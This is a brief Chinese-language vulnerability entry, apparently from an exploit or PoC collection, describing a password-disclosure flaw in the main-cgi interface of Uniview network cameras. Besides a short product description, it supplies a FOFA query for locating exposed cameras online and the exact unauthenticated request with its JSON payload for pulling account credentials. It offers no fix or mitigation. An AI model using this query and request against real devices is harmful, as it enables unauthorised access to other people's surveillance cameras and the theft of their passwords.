浙江宇视科技视频监控main-cgi密码泄露漏洞
一、漏洞描述
宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞,可以获取账号密码
二、影响版本
uniview-视频监控
三、资产测绘
fofa:app="uniview-视频监控"
特征:
四、漏洞复现
/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}
